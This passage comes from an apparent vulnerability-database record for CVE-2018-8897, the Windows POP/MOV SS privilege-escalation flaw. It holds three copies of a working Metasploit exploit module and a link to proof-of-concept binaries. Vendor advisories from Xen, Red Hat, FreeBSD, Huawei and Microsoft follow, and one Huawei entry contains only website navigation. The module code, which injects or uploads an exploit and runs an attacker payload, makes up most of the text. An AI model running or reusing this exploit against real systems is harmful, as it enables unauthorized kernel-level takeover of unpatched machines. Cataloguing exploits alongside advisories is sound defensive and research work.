\"#{temp_path}\\\\#{exploit_name}\"\n @payload_exe = generate_payload_exe\n end\n\n def inject_magic(process)\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897', 'reflective_dll.x64.dll')\n library_path = ::File.expand_path(library_path)\n\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n dll = ''\n ::File.open(library_path, 'rb') { |f| dll = f.read }\n\n exploit_mem, offset = inject_dll_data_into_process(process, dll)\n\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\n payload_mem = inject_into_process(process, payload.encoded)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n end\n\n def validate_active_host\n begin\n print_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(e)\n raise Msf::Exploit::Failed, 'Could not connect to session'\n end\n end\n\n def validate_remote_path(path)\n unless directory?(path)\n fail_with(Failure::Unreachable, \"#{path} does not exist on the target\")\n end\n end\n\n def validate_target\n if sysinfo['Architecture'] == ARCH_X86\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\n end\n if sysinfo['OS'] =~ /XP/\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\n end\n end\n\n def ensure_clean_destination(path)\n if file?(path)\n print_status(\"#{path} already exists on the target. Deleting...\")\n begin\n file_rm(path)\n print_status(\"Deleted #{path}\")\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(e)\n print_error(\"Unable to delete #{path}\")\n end\n end\n end\n\n def ensure_clean_exploit_destination\n ensure_clean_destination(exploit_path)\n end\n\n def ensure_clean_payload_destination\n ensure_clean_destination(payload_path)\n end\n\n def upload_exploit\n local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897', 'cve-2018-8897-exe.exe')\n upload_file(exploit_path, local_exploit_path)\n print_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\")\n end\n\n def upload_payload\n write_file(payload_path, payload_exe)\n print_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\")\n end\n\n def execute_exploit\n sleep(datastore['EXECUTE_DELAY'])\n print_status(\"Running exploit #{exploit_path} with payload #{payload_path}\")\n output = cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\")\n vprint_status(output)\n end\n\n def exploit_dll\n begin\n print_status('Checking target...')\n validate_active_host\n validate_target\n print_status('Target Looks Good... trying to start notepad')\n process = setup_process\n inject_magic(process)\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(e)\n print_error(e.message)\n end\n end\n\n def exploit_exe\n begin\n validate_remote_path(temp_path)\n ensure_clean_exploit_destination\n ensure_clean_payload_destination\n upload_exploit\n upload_payload\n execute_exploit\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(e)\n print_error(e.message)\n ensure_clean_exploit_destination\n ensure_clean_payload_destination\n end\n end\n\n def exploit\n begin\n validate_active_host\n validate_target\n if datastore['USE_INJECTION']\n exploit_dll\n else\n exploit_exe\n end\n end\n end\n\n attr_reader :exploit_name\n attr_reader :payload_name\n attr_reader :payload_exe\n attr_reader :temp_path\n attr_reader :payload_path\n attr_reader :exploit_path\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/mov_ss.rb"}], "zdt": [{"lastseen": "2018-07-13T21:54:00", "description": "This Metasploit module exploits a vulnerability in a statement in the system programming guide of the Intel 64 and IA-32 architectures software developer's manual being mishandled in various operating system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS. This Metasploit module will upload the pre-compiled exploit and use it to execute the final payload in order to gain remote code execution.", "edition": 1, "published": "2018-07-13T00:00:00", "title": "Microsoft Windows #MicrosoftWindows POP/MOV SS Local Privilege Elevation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-07-13T00:00:00", "id": "1337DAY-ID-30720", "href": "https://0day.today/exploit/description/30720", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core/post/common'\r\nrequire 'msf/core/post/file'\r\nrequire 'msf/core/post/windows/priv'\r\nrequire 'msf/core/post/windows/registry'\r\nrequire 'msf/core/exploit/exe'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::Common\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in a statement in the system programming guide\r\n of the Intel 64 and IA-32 architectures software developer's manual being mishandled\r\n in various operating system kerneles, resulting in unexpected behavior for #DB\r\n excpetions that are deferred by MOV SS or POP SS.\r\n\r\n This module will upload the pre-compiled exploit and use it to execute the final\r\n payload in order to gain remote code execution.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Nick Peterson', # Original discovery (@nickeverdox)\r\n 'Nemanja Mulasmajic', # Original discovery (@0xNemi)\r\n 'Can BAPlA1/4k <can1357>', # PoC\r\n 'bwatters-r7' # msf module\r\n ],\r\n 'Platform' => [ 'win' ],\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'May 08 2018',\r\n 'References' =>\r\n [\r\n ['CVE', '2018-8897'],\r\n ['EDB', '44697'],\r\n ['BID', '104071'],\r\n ['URL', 'https://github.com/can1357/CVE-2018-8897/'],\r\n ['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'DisablePayloadHandler' => 'False'\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('EXPLOIT_NAME',\r\n [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),\r\n OptString.new('PAYLOAD_NAME',\r\n [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),\r\n OptString.new('PATH',\r\n [false, 'Path to write binaries (%TEMP% by default).', nil]),\r\n OptInt.new('EXECUTE_DELAY',\r\n [false, 'The number of seconds to delay before executing the exploit', 3])\r\n ])\r\n end\r\n\r\n def setup\r\n super\r\n @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\r\n @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\r\n @exploit_name = \"#{exploit_name}.exe\" unless exploit_name.match(/\\.exe$/i)\r\n @payload_name = \"#{payload_name}.exe\" unless payload_name.match(/\\.exe$/i)\r\n @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')\r\n @payload_path = \"#{temp_path}\\\\#{payload_name}\"\r\n @exploit_path = \"#{temp_path}\\\\#{exploit_name}\"\r\n @payload_exe = generate_payload_exe\r\n end\r\n\r\n def validate_active_host\r\n begin\r\n host = session.session_host\r\n print_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n raise Msf::Exploit::Failed, 'Could not connect to session'\r\n end\r\n end\r\n\r\n def validate_remote_path(path)\r\n unless directory?(path)\r\n fail_with(Failure::Unreachable, \"#{path} does not exist on the target\")\r\n end\r\n end\r\n\r\n def validate_target\r\n if sysinfo['Architecture'] == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\r\n end\r\n if sysinfo['OS'] =~ /XP/\r\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\r\n end\r\n end\r\n\r\n def ensure_clean_destination(path)\r\n if file?(path)\r\n print_status(\"#{path} already exists on the target. Deleting...\")\r\n begin\r\n file_rm(path)\r\n print_status(\"Deleted #{path}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(\"Unable to delete #{path}\")\r\n end\r\n end\r\n end\r\n\r\n def ensure_clean_exploit_destination\r\n ensure_clean_destination(exploit_path)\r\n end\r\n\r\n def ensure_clean_payload_destination\r\n ensure_clean_destination(payload_path)\r\n end\r\n\r\n def upload_exploit\r\n local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe')\r\n upload_file(exploit_path, local_exploit_path)\r\n print_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\")\r\n end\r\n\r\n def upload_payload\r\n write_file(payload_path, payload_exe)\r\n print_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\")\r\n end\r\n\r\n def execute_exploit\r\n sleep(datastore['EXECUTE_DELAY'])\r\n print_status(\"Running exploit #{exploit_path} with payload #{payload_path}\")\r\n output = cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\")\r\n vprint_status(output)\r\n end\r\n\r\n def exploit\r\n begin\r\n validate_active_host\r\n validate_target\r\n validate_remote_path(temp_path)\r\n ensure_clean_exploit_destination\r\n ensure_clean_payload_destination\r\n upload_exploit\r\n upload_payload\r\n execute_exploit\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(e.message)\r\n ensure_clean_exploit_destination\r\n ensure_clean_payload_destination\r\n end\r\n end\r\n\r\n attr_reader :exploit_name\r\n attr_reader :payload_name\r\n attr_reader :payload_exe\r\n attr_reader :temp_path\r\n attr_reader :payload_path\r\n attr_reader :exploit_path\r\nend\n\n# 0day.today [2018-07-13] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30720"}, {"lastseen": "2018-05-23T02:47:23", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2018-05-23T00:00:00", "title": "Microsoft Windows - POP/MOV SS Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-05-23T00:00:00", "id": "1337DAY-ID-30427", "href": "https://0day.today/exploit/description/30427", "sourceData": "Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privilages.\r\n \r\n- KVA Shadowing should be disabled and the relevant security update should be uninstalled.\r\n- This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3.\r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44697.zip\n\n# 0day.today [2018-05-23] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30427"}], "huawei": [{"lastseen": "2020-09-10T06:41:01", "bulletinFamily": "software", "cvelist": ["CVE-2018-8897"], "description": "A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, some Xen configurations, or FreeBSD, or a Linux kernel. Some of Huawei products also be affected for this vulnerability. An attacker may exploit this vulnerability to escalate their privileges. (Vulnerability ID: HWPSIRT-2018-05100)\nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2018-8897.\nHuawei has released software updates to fix this vulnerability. This advisory is available at the following link:\nhttp://www.huawei.com/en/psirt/security-advisories/huawei-sa-20181010-01-debug-en", "edition": 1, "modified": "2020-09-09T00:00:00", "published": "2019-09-21T00:00:00", "id": "HUAWEI-SA-20181010-01-DEBUG", "href": "https://www.huawei.com/en/psirt/security-advisories/2018/huawei-sa-20181010-01-debug-en", "title": "Security Advisory - Privilege Escalation Vulnerability in Some Huawei Products", "type": "huawei", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-21T10:34:57", "bulletinFamily": "software", "cvelist": ["CVE-2018-8897"], "description": "Products\n\nSwitches\nRouters\nWLAN\nStorage\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nIntelligent Computing\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nIndustry Cloud Enablement Service\nImprovement Service\nCustomer Support Service\nSee All\n\n\n\nPartner\n\nFind a Partner\nChannel Partner Program\nBecome a Partner\nOpenLab\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\nPre-Sale Resource Center\n\nGo to Full Support", "edition": 1, "modified": "2019-09-21T00:00:00", "published": "2019-09-21T00:00:00", "id": "HUAWEI-SA-20190921-01-DEBUG", "href": "https://www.huawei.com/en/psirt/security-advisories/2019/huawei-sa-20190921-01-debug-en", "title": "Security Advisory - Privilege Escalation Vulnerability in Some Huawei Products", "type": "huawei", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "xen": [{"lastseen": "2018-05-08T23:14:09", "bulletinFamily": "software", "cvelist": ["CVE-2018-8897"], "description": "#### ISSUE DESCRIPTION\nWhen switching stacks, it is critical to have a matching stack segment and stack pointer. To allow an atomic update from what would otherwise be two adjacent instructions, an update which changes the stack segment (either a mov or pop instruction with %ss encoded as the destination register) sets the movss shadow for one instruction.\nThe exact behaviour of the movss shadow is poorly understood.\nIn practice, a movss shadow delays some debug exceptions (e.g. from a hardware breakpoint) until the subsequent instruction has completed. If the subsequent instruction normally transitions to supervisor mode (e.g. a system call), then the debug exception will be taken after the transition to ring0 is completed.\nFor most transitions to supervisor mode, this only confuses Xen into printing a lot of debugging information. For the syscall instruction however, the exception gets taken before the syscall handler can move off the guest stack.\n#### IMPACT\nA malicious PV guest can escalate their privilege to that of the hypervisor.\n#### VULNERABLE SYSTEMS\nAll versions of Xen are vulnerable.\nOnly x86 systems are vulnerable. ARM systems are not vulnerable.\nOnly x86 PV guests can exploit the vulnerability. x86 HVM and PVH guests cannot exploit the vulnerability.\nAn attacker needs to be able to control hardware debugging facilities to exploit the vulnerability, but such permissions are typically available to unprivileged users.\n", "edition": 1, "modified": "2018-05-08T16:45:00", "published": "2018-05-08T16:45:00", "id": "XSA-260", "href": "http://xenbits.xen.org/xsa/advisory-260.html", "title": "x86: mishandling of debug exceptions", "type": "xen", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2018-07-14T02:42:05", "description": "", "published": "2018-07-13T00:00:00", "type": "packetstorm", "title": "Microsoft Windows POP/MOV SS Local Privilege Elevation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-07-13T00:00:00", "id": "PACKETSTORM:148549", "href": "https://packetstormsecurity.com/files/148549/Microsoft-Windows-POP-MOV-SS-Local-Privilege-Elevation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/post/common' \nrequire 'msf/core/post/file' \nrequire 'msf/core/post/windows/priv' \nrequire 'msf/core/post/windows/registry' \nrequire 'msf/core/exploit/exe' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::Common \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability', \n'Description' => %q{ \nThis module exploits a vulnerability in a statement in the system programming guide \nof the Intel 64 and IA-32 architectures software developer's manual being mishandled \nin various operating system kerneles, resulting in unexpected behavior for #DB \nexcpetions that are deferred by MOV SS or POP SS. \n \nThis module will upload the pre-compiled exploit and use it to execute the final \npayload in order to gain remote code execution. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Nick Peterson', # Original discovery (@nickeverdox) \n'Nemanja Mulasmajic', # Original discovery (@0xNemi) \n'Can BAPlA1/4k <can1357>', # PoC \n'bwatters-r7' # msf module \n], \n'Platform' => [ 'win' ], \n'SessionTypes' => [ 'meterpreter' ], \n'Targets' => \n[ \n[ 'Windows x64', { 'Arch' => ARCH_X64 } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'May 08 2018', \n'References' => \n[ \n['CVE', '2018-8897'], \n['EDB', '44697'], \n['BID', '104071'], \n['URL', 'https://github.com/can1357/CVE-2018-8897/'], \n['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/'] \n], \n'DefaultOptions' => \n{ \n'DisablePayloadHandler' => 'False' \n} \n)) \n \nregister_options([ \nOptString.new('EXPLOIT_NAME', \n[false, 'The filename to use for the exploit binary (%RAND% by default).', nil]), \nOptString.new('PAYLOAD_NAME', \n[false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]), \nOptString.new('PATH', \n[false, 'Path to write binaries (%TEMP% by default).', nil]), \nOptInt.new('EXECUTE_DELAY', \n[false, 'The number of seconds to delay before executing the exploit', 3]) \n]) \nend \n \ndef setup \nsuper \n@exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) \n@payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) \n@exploit_name = \"#{exploit_name}.exe\" unless exploit_name.match(/\\.exe$/i) \n@payload_name = \"#{payload_name}.exe\" unless payload_name.match(/\\.exe$/i) \n@temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP') \n@payload_path = \"#{temp_path}\\\\#{payload_name}\" \n@exploit_path = \"#{temp_path}\\\\#{exploit_name}\" \n@payload_exe = generate_payload_exe \nend \n \ndef validate_active_host \nbegin \nhost = session.session_host \nprint_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\") \nrescue Rex::Post::Meterpreter::RequestError => e \nelog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") \nraise Msf::Exploit::Failed, 'Could not connect to session' \nend \nend \n \ndef validate_remote_path(path) \nunless directory?(path) \nfail_with(Failure::Unreachable, \"#{path} does not exist on the target\") \nend \nend \n \ndef validate_target \nif sysinfo['Architecture'] == ARCH_X86 \nfail_with(Failure::NoTarget, 'Exploit code is 64-bit only') \nend \nif sysinfo['OS'] =~ /XP/ \nfail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') \nend \nend \n \ndef ensure_clean_destination(path) \nif file?(path) \nprint_status(\"#{path} already exists on the target. Deleting...\") \nbegin \nfile_rm(path) \nprint_status(\"Deleted #{path}\") \nrescue Rex::Post::Meterpreter::RequestError => e \nelog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") \nprint_error(\"Unable to delete #{path}\") \nend \nend \nend \n \ndef ensure_clean_exploit_destination \nensure_clean_destination(exploit_path) \nend \n \ndef ensure_clean_payload_destination \nensure_clean_destination(payload_path) \nend \n \ndef upload_exploit \nlocal_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe') \nupload_file(exploit_path, local_exploit_path) \nprint_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\") \nend \n \ndef upload_payload \nwrite_file(payload_path, payload_exe) \nprint_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\") \nend \n \ndef execute_exploit \nsleep(datastore['EXECUTE_DELAY']) \nprint_status(\"Running exploit #{exploit_path} with payload #{payload_path}\") \noutput = cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\") \nvprint_status(output) \nend \n \ndef exploit \nbegin \nvalidate_active_host \nvalidate_target \nvalidate_remote_path(temp_path) \nensure_clean_exploit_destination \nensure_clean_payload_destination \nupload_exploit \nupload_payload \nexecute_exploit \nrescue Rex::Post::Meterpreter::RequestError => e \nelog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") \nprint_error(e.message) \nensure_clean_exploit_destination \nensure_clean_payload_destination \nend \nend \n \nattr_reader :exploit_name \nattr_reader :payload_name \nattr_reader :payload_exe \nattr_reader :temp_path \nattr_reader :payload_path \nattr_reader :exploit_path \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148549/mov_ss.rb.txt"}], "redhat": [{"lastseen": "2019-08-13T18:47:12", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting this issue.", "modified": "2018-05-09T02:06:26", "published": "2018-05-09T01:59:05", "id": "RHSA-2018:1352", "href": "https://access.redhat.com/errata/RHSA-2018:1352", "type": "redhat", "title": "(RHSA-2018:1352) Moderate: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:41", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting this issue.", "modified": "2018-05-09T02:05:54", "published": "2018-05-09T01:59:19", "id": "RHSA-2018:1353", "href": "https://access.redhat.com/errata/RHSA-2018:1353", "type": "redhat", "title": "(RHSA-2018:1353) Moderate: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:14", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5715", "CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting this issue.\n\nBug Fix(es):\n\n* The kernel build requirements have been updated to the GNU Compiler Collection (GCC) compiler version that has the support for Retpolines. The Retpolines mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. (BZ#1554256)", "modified": "2018-05-10T22:10:56", "published": "2018-05-09T01:08:05", "id": "RHSA-2018:1350", "href": "https://access.redhat.com/errata/RHSA-2018:1350", "type": "redhat", "title": "(RHSA-2018:1350) Moderate: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:11", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5715", "CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting this issue.\n\nBug Fix(es):\n\n* If an NFSv3 client mounted a subdirectory of an exported file system, a directory entry to the mount hosting the export was incorrectly held even after clearing the cache. Consequently, attempts to unmount the subdirectory with the umount command failed with the EBUSY error. With this update, the underlying source code has been fixed, and the unmount operation now succeeds as expected in the described situation. (BZ#1538588)\n\n* The kernel build requirements have been updated to the GNU Compiler Collection (GCC) compiler version that has the support for Retpolines. The Retpolines mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. (BZ#1554254)", "modified": "2018-05-10T22:11:42", "published": "2018-05-09T01:14:35", "id": "RHSA-2018:1351", "href": "https://access.redhat.com/errata/RHSA-2018:1351", "type": "redhat", "title": "(RHSA-2018:1351) Moderate: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:00", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5715", "CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting this issue.\n\nBug Fix(es):\n\n* The kernel build requirements have been updated to the GNU Compiler Collection (GCC) compiler version that has the support for Retpolines. The Retpolines mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. (BZ#1554251)", "modified": "2018-05-10T22:10:34", "published": "2018-05-09T00:59:57", "id": "RHSA-2018:1349", "href": "https://access.redhat.com/errata/RHSA-2018:1349", "type": "redhat", "title": "(RHSA-2018:1349) Moderate: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:31:56", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "\nProblem Description:\nThe MOV SS and POP SS instructions inhibit debug exceptions\n\tuntil the instruction boundary following the next instruction.\n\tIf that instruction is a system call or similar instruction\n\tthat transfers control to the operating system, the debug\n\texception will be handled in the kernel context instead of\n\tthe user context.\nImpact:\nAn authenticated local attacker may be able to read\n\tsensitive data in kernel memory, control low-level operating\n\tsystem functions, or may panic the system.\n", "edition": 5, "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "521CE804-52FD-11E8-9123-A4BADB2F4699", "href": "https://vuxml.freebsd.org/freebsd/521ce804-52fd-11e8-9123-a4badb2f4699.html", "title": "FreeBSD -- Mishandling of x86 debug exceptions", "type": "freebsd", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:44:20", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-8174", "CVE-2018-8897"], "description": "<html><body><p>Resolves vulnerabilities in Windows Server 2008, Windows Embedded POSReady 2009, and Windows Embedded Standard 2009.</p><h2>Summary</h2><div class=\"kb-summary-section section\"><p>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory.<br/>A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory.\u00a0<br/><br/>To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).</p><ul class=\"sbody-free_list\"><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8174\" id=\"kb-link-2\" target=\"_self\">CVE-2018-8174</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8897\" id=\"kb-link-2\" target=\"_self\">CVE-2018-8897</a></li></ul></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><strong>Important\u00a0</strong>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.</div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"> <h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-13\" target=\"_self\">Windows Update: FAQ</a>. </div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\"http://catalog.update.microsoft.com/v7/site/search.aspx?q=4134651\" id=\"kb-link-14\" target=\"_self\">Microsoft Update Catalog</a> website. <br/></div></div><h2>Deployment information</h2>For deployment details for this security update, go to the following article in the Microsoft Knowledge Base:<br/> <div class=\"indent\"> <a href=\"https://support.microsoft.com/en-us/help/20180508\" id=\"kb-link-9\">Security update deployment information: May 08, 2018</a></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><table class=\"faq-section\" faq-section=\"\"><tbody 